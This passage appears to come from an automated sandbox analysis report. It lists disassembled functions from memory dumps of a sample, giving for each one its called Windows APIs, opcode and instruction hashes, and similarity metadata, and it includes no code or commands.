                                                                                          • Instruction ID: 8c7c984521ff0e7d244c00c5f51233a867d9ad2c64f7df6a07b5b05dcc5a2560
                                                                                          • Opcode Fuzzy Hash: 962d8d2f7084778136ff7f25eb33d3b13dd85e69e4921cc740d695c23556a601
                                                                                          • Instruction Fuzzy Hash: 05D1F7B4A0821CCFCB24DB34C9946ADB7B6BF88305F2094EAD609A7344DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11631, Relevance: 3.3, APIs: 2, Instructions: 276COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: c1b26b775ea2719dbaab0b72e08d54ac4fe40b5f355c39ca1d5f6191e8874fda
                                                                                          • Instruction ID: 318f4c3081b4a21ced15768b71d8cf2d26e6ac76499d62f9cc93ad7ee59d9d2d
                                                                                          • Opcode Fuzzy Hash: c1b26b775ea2719dbaab0b72e08d54ac4fe40b5f355c39ca1d5f6191e8874fda
                                                                                          • Instruction Fuzzy Hash: EBC1F7B4A0821CCFCB249B24C9946ADB7B6BF88305F2094EAD709A7344DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11679, Relevance: 3.3, APIs: 2, Instructions: 267COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 033ae9373e6fad67987804fc942ae854f0f906d4fb9f70ab9be3231989c3a167
                                                                                          • Instruction ID: e7302f42d7218841b0335a4215e9fbbe571f10912312db7be66d32c9fb3af39b
                                                                                          • Opcode Fuzzy Hash: 033ae9373e6fad67987804fc942ae854f0f906d4fb9f70ab9be3231989c3a167
                                                                                          • Instruction Fuzzy Hash: A8C107B4A0821CCFCB249B24C9946ADB7B6AF88305F2094EAD709A7344DF358E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E116B5, Relevance: 3.3, APIs: 2, Instructions: 262COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: aaadb96bb30e1d8c6b507fadc773200e86ff1d449c21d7ff5ee7790caa055351
                                                                                          • Instruction ID: df10b6bdd64c57207fb26aecf2bc43f09b0aa65535285ff4b8755f49a6684ca7
                                                                                          • Opcode Fuzzy Hash: aaadb96bb30e1d8c6b507fadc773200e86ff1d449c21d7ff5ee7790caa055351
                                                                                          • Instruction Fuzzy Hash: 54C107B4A0821C8FCB24DB64C8946ADB7B6AF88305F2094EAD609A7344DF359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E116FD, Relevance: 3.3, APIs: 2, Instructions: 253COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 3f4d8b70584078f8c25a4b86ce50d7b6b379687ca9747efea6cf53f99e98b9cc
                                                                                          • Instruction ID: 33cd070c06f66427fe1bde49f08cf7ae1f7719b1ac0017c2b6a5c450af491f6b
                                                                                          • Opcode Fuzzy Hash: 3f4d8b70584078f8c25a4b86ce50d7b6b379687ca9747efea6cf53f99e98b9cc
                                                                                          • Instruction Fuzzy Hash: 59B117B4A0821C8FCB249B74C9946ADB7B6AF88305F2094EAD609A7344DF358E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11739, Relevance: 3.2, APIs: 2, Instructions: 248COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: a646e170f55f786c3ed23d04217b40c85a3a51c9aab5ce697d77bd1ad210f0c1
                                                                                          • Instruction ID: 8d28de1fc1a8f28b5d7b252213675b74cb388e9817b97f73fe21c7fef1cce783
                                                                                          • Opcode Fuzzy Hash: a646e170f55f786c3ed23d04217b40c85a3a51c9aab5ce697d77bd1ad210f0c1
                                                                                          • Instruction Fuzzy Hash: AAB1F8B4A0822C8FCB24DB74C8946ADB7B6BF88305F6094E9D609A7344DF358E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11781, Relevance: 3.2, APIs: 2, Instructions: 241COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 1335383f181eedf1453505166998b08ebe9774c8c19d8d10870bdde49d2cfbd6
                                                                                          • Instruction ID: 908350840e84f373a40de891bffd71984c4901e5e39165b76f65effd708283cd
                                                                                          • Opcode Fuzzy Hash: 1335383f181eedf1453505166998b08ebe9774c8c19d8d10870bdde49d2cfbd6
                                                                                          • Instruction Fuzzy Hash: D5B118B4A0822C8FCB24DB74C8947ADB7B6AF88305F2094E9D609A7344DF358D85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E117C9, Relevance: 3.2, APIs: 2, Instructions: 234COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: ee0aff696c11bf2720e6abefce69c27985a42f184aa4aff43cdbe0542e5ea3ae
                                                                                          • Instruction ID: f13fb85b0e29509286882edf13892737b81773e31c53a93ffad50bd0bb9ae5ce
                                                                                          • Opcode Fuzzy Hash: ee0aff696c11bf2720e6abefce69c27985a42f184aa4aff43cdbe0542e5ea3ae
                                                                                          • Instruction Fuzzy Hash: 53A128B4A0822C8FCB24DB74C8947ADB7B6AF88305F2094E9D609A7344DF358E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11811, Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: d6e7465e7029f3ed52556177011833420d4d166faddfb6d8e4d2dd5da8e1b6ff
                                                                                          • Instruction ID: dc5b37fede6edcdd6a4f0b16e41b3410fe81d72c39fdfad619b8869935de413a
                                                                                          • Opcode Fuzzy Hash: d6e7465e7029f3ed52556177011833420d4d166faddfb6d8e4d2dd5da8e1b6ff
                                                                                          • Instruction Fuzzy Hash: 95A139B4A0822C8FCB24DB74C8947ADB7B6AF88305F6094E9D60AA7344DF358D85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E1186F, Relevance: 3.2, APIs: 2, Instructions: 216COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: ea4424e2f37b269b720fd8ce817841a9b6b8bcc0967e473bc5634b89fe979fd4
                                                                                          • Instruction ID: 8007a4c4a0b56307fa6b957b7b76bf43e4fc360e21c71244b6b32e51de64f282
                                                                                          • Opcode Fuzzy Hash: ea4424e2f37b269b720fd8ce817841a9b6b8bcc0967e473bc5634b89fe979fd4
                                                                                          • Instruction Fuzzy Hash: 989128B4A082288FCB24DB74C8947ADB7B6BF88305F6094E9D60AA7344DF358D85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F44AA8, Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f4a400569d086b56a82206e9a309f7b491579fdc6569a30f0cf4c80f96766a16
                                                                                          • Instruction ID: f2b81d3f5c4f6dc7a9c8c78c2d3c389d4588cbd47ca48fc9e9c22580dddfd408
                                                                                          • Opcode Fuzzy Hash: f4a400569d086b56a82206e9a309f7b491579fdc6569a30f0cf4c80f96766a16
                                                                                          • Instruction Fuzzy Hash: DE910470B082458FCB05EBB4CC547AE7BB6AF86304F1884BAD545EB296EF34DC098761
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E118CD, Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 35b6ead7a87dc1a6b9d24b4ca80aa5c18b79dcb453ebb29fbdb07346861524e4
                                                                                          • Instruction ID: 114ba055400570c66e0e2c32f3b701bcc71f6ebeafcf27e8583c67d7d5d901d9
                                                                                          • Opcode Fuzzy Hash: 35b6ead7a87dc1a6b9d24b4ca80aa5c18b79dcb453ebb29fbdb07346861524e4
                                                                                          • Instruction Fuzzy Hash: 739138B4A092288FCB24DB74C8947ADB7B6AF88305F2084E9D60AA7244DF358D85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E11915, Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: fad393579ebe109fc9425cc3145941fd186e921f2c08bfada36a9d3f3c755d69
                                                                                          • Instruction ID: 316732d25a8764d42118775373318ad694eedd2e5fae1520a0305e0ee5633968
                                                                                          • Opcode Fuzzy Hash: fad393579ebe109fc9425cc3145941fd186e921f2c08bfada36a9d3f3c755d69
                                                                                          • Instruction Fuzzy Hash: D08149B4A092288FCB24EB74C8947ADB7B6BF88305F1094E9D60AA7344DF358D85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E1195D, Relevance: 1.7, APIs: 1, Instructions: 191COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 4dd5c79e5570f681ceba0d6cf1ab37a76c5a0eaf50ad792b309bc05a383d59e6
                                                                                          • Instruction ID: 3ba0b73765c8035eed832f50d0f2b2e7d19a388b31108edefaa53bd869e9d103
                                                                                          • Opcode Fuzzy Hash: 4dd5c79e5570f681ceba0d6cf1ab37a76c5a0eaf50ad792b309bc05a383d59e6
                                                                                          • Instruction Fuzzy Hash: F6814AB4A092288FCB24EB74C8947ADB7B6BF88305F1084E9D60AA7344DF358D85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E119A5, Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 48f95e0de81ccbbde1e1eb31aed75d56274f34a6f905e4579f83f6a1c4fcf7a5
                                                                                          • Instruction ID: d277cb02ec9d19f3a8327316d3f0ca72c3b08ca73bde5632302888227e8c5aa4
                                                                                          • Opcode Fuzzy Hash: 48f95e0de81ccbbde1e1eb31aed75d56274f34a6f905e4579f83f6a1c4fcf7a5
                                                                                          • Instruction Fuzzy Hash: E1714BB4A092288FCB24EB74C8947ADB7B6BF88305F1084E9D60AA7344DF358D85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E119ED, Relevance: 1.7, APIs: 1, Instructions: 175COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 5be712c09f13123b47e446ccd2d2f75983ca65aedfd908e0b6d80e6a3943849a
                                                                                          • Instruction ID: 6d34639d67b5f126e8ae456a87959f462d613843679334c009467eaba50f4168
                                                                                          • Opcode Fuzzy Hash: 5be712c09f13123b47e446ccd2d2f75983ca65aedfd908e0b6d80e6a3943849a
                                                                                          • Instruction Fuzzy Hash: 4A616FB4A082288FCB24EB75C8547ADB7BABF88305F1484E9D60AA7344DF348D85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F44BF8, Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 7c8c0f85d4fa509cdd34e53d9f837eb2bd7c6cabf3d75346aa58f7f76cd54814
                                                                                          • Instruction ID: a21513d872d4e9ab48f3dcaee0e00ceb048daa9c3ed5688fa128dc4ed0d6c3e7
                                                                                          • Opcode Fuzzy Hash: 7c8c0f85d4fa509cdd34e53d9f837eb2bd7c6cabf3d75346aa58f7f76cd54814
                                                                                          • Instruction Fuzzy Hash: 13519871B042059FCB04EFB4D895AAEB7F6EF84314F148969E506AB295EF30E8058B61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00DF0A18, Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499780379.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DF0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cfc792810813e25dbb38e978198aa03b097233d9829e4a27636cca14f0485690
                                                                                          • Instruction ID: 2426a1752aad33726e095e000f2d4b6ba17225bfaa28b39bd10c74faa487cbd0
                                                                                          • Opcode Fuzzy Hash: cfc792810813e25dbb38e978198aa03b097233d9829e4a27636cca14f0485690
                                                                                          • Instruction Fuzzy Hash: 67413671D043898FCB11CFB9D8042AEBFF4AF89310F1985AED544A7282DB789845CBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 028051E5, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02805302
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: 955d21e476b9f505ce22616aa5791acede836ad37666673fc33546d80c741401
                                                                                          • Instruction ID: dc6120a6dfb62c41a127a01e29568328bff1c4ec9c8c10266a4d293c8d7eae02
                                                                                          • Opcode Fuzzy Hash: 955d21e476b9f505ce22616aa5791acede836ad37666673fc33546d80c741401
                                                                                          • Instruction Fuzzy Hash: 7E51E1B5D00308DFDB14CF99C884ADEBBB5BF48314F65812AE918AB250D7B49845CF90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 028051F0, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02805302
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: 65146499f29116e8559da53c6734a19250efe52af750cbd0e184305036b7179b
                                                                                          • Instruction ID: a7cefad604ce047c06d815c6c1797ed69af32835260abc456512fed21eeff36e
                                                                                          • Opcode Fuzzy Hash: 65146499f29116e8559da53c6734a19250efe52af750cbd0e184305036b7179b
                                                                                          • Instruction Fuzzy Hash: 2741D0B5D00308DFDF14CFA9C884ADEBBB5BF48314F64852AE819AB250D7B5A845CF90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 028069C4, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 02807D61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: CallProcWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2714655100-0
                                                                                          • Opcode ID: 447567849f913d5587fb649435798d0877af6a19f59b6347e5bc89f8e1de1975
                                                                                          • Instruction ID: 39ea06a550c1a8141a406cf492b1b5441c73b38677264668d28590684613f477
                                                                                          • Opcode Fuzzy Hash: 447567849f913d5587fb649435798d0877af6a19f59b6347e5bc89f8e1de1975
                                                                                          • Instruction Fuzzy Hash: 1F414CB9A00209DFDB54CF99C888AAAFBF5FF88318F148459D519A7364D374B841CFA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F4496D, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 00F44A31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: e2918f4b6a79480e363b5f0cd74b104d09cc6e6448d669afb88f1da88f31eaed
                                                                                          • Instruction ID: 4c92e8a3ecff270265f83609076e55829343523a7c41c3faf0489088b83a9ddd
                                                                                          • Opcode Fuzzy Hash: e2918f4b6a79480e363b5f0cd74b104d09cc6e6448d669afb88f1da88f31eaed
                                                                                          • Instruction Fuzzy Hash: 6231DEB1D00258DFCB20CFA9C884A9EBFF5BF48310F14812AE819BB254D774A945DFA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F44978, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 00F44A31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: 0dadd49e4456a320f7fdc9385a2faa085aefcc80d2bbfeb0a6ad6b5617cfd987
                                                                                          • Instruction ID: eb05c8c84dd988f1b57970b30ff88601a9e241bcaa58ed92e6c58f8f4677f737
                                                                                          • Opcode Fuzzy Hash: 0dadd49e4456a320f7fdc9385a2faa085aefcc80d2bbfeb0a6ad6b5617cfd987
                                                                                          • Instruction Fuzzy Hash: D831DEB1D00258DFCB20CF9AC884A9EBFF5BF48310F14812AE819BB254D774A945DFA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F44704, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 00F447C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Open
                                                                                          • String ID:
                                                                                          • API String ID: 71445658-0
                                                                                          • Opcode ID: fc7ae993155dadb4ddb59e87ec3abb5f01342f8c79ee4328143eb09514780061
                                                                                          • Instruction ID: c0ec4f2b6dee72768b7dc1cd4588d9af49a2e6d9fe96b08db549adbf55ccc030
                                                                                          • Opcode Fuzzy Hash: fc7ae993155dadb4ddb59e87ec3abb5f01342f8c79ee4328143eb09514780061
                                                                                          • Instruction Fuzzy Hash: 583114B1D012898FCB10CFA8C584ACEFFF5BF49314F29856AD809AB241C3759845CB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F44710, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 00F447C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Open
                                                                                          • String ID:
                                                                                          • API String ID: 71445658-0
                                                                                          • Opcode ID: a098335243b6a98f99c8a120c3a3ee11e5fd5cc070da00ea82d511813ea3700b
                                                                                          • Instruction ID: d88098ff3fa9571e164b71cfc9aa3f6408341144e735621bce6ed30f62b8fc5e
                                                                                          • Opcode Fuzzy Hash: a098335243b6a98f99c8a120c3a3ee11e5fd5cc070da00ea82d511813ea3700b
                                                                                          • Instruction Fuzzy Hash: 3F31EEB1D002498FDB10CF99C584A8EFFF5BF49314F28856AE808AB341C775A885CBA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00B55541, Relevance: 1.6, APIs: 1, Instructions: 71libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496139536.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: c5a8adb0e3e57352d6c033d0efbebb0fa46eb6687df3f56de472a8fdf311f5d6
                                                                                          • Instruction ID: 76bc7f0dcef419eb3659a27c6a587deb7ffc08ffd06380beab2128ae5a45850b
                                                                                          • Opcode Fuzzy Hash: c5a8adb0e3e57352d6c033d0efbebb0fa46eb6687df3f56de472a8fdf311f5d6
                                                                                          • Instruction Fuzzy Hash: 40218934A04648CFD716DB74D8A4B9DBBF2AB89306F2184A9D401AB2A5D734C84ACF10
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 02806DD1, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02806E5F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 40fd46dc4e692d378ef9505825bf9e4dd82441f5e0e84774df80ed574cbf538b
                                                                                          • Instruction ID: 5ffc391b322fe18fdeb2ba0a1c34c3cd3a8c93a29d03597af47e33f601880f82
                                                                                          • Opcode Fuzzy Hash: 40fd46dc4e692d378ef9505825bf9e4dd82441f5e0e84774df80ed574cbf538b
                                                                                          • Instruction Fuzzy Hash: 182105B5900218EFDB10CFA9D884ADEBBF8FB48324F14841AE918A3350D374A955CFA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 02806DD8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02806E5F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: d10a8de18254a7a3e1c5feb6233c3ef22c430f158c541316f17c425c8344e610
                                                                                          • Instruction ID: ecc4e98addfc59ee4a7f9f3fb5687ec6094aca0c09282ba5015edc0d3569782f
                                                                                          • Opcode Fuzzy Hash: d10a8de18254a7a3e1c5feb6233c3ef22c430f158c541316f17c425c8344e610
                                                                                          • Instruction Fuzzy Hash: EE21E4B5900218EFDB10CFA9D984ADEBBF8FB48324F14841AE914A3350D375A954CFA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 0280BE68, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 0280BEE2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
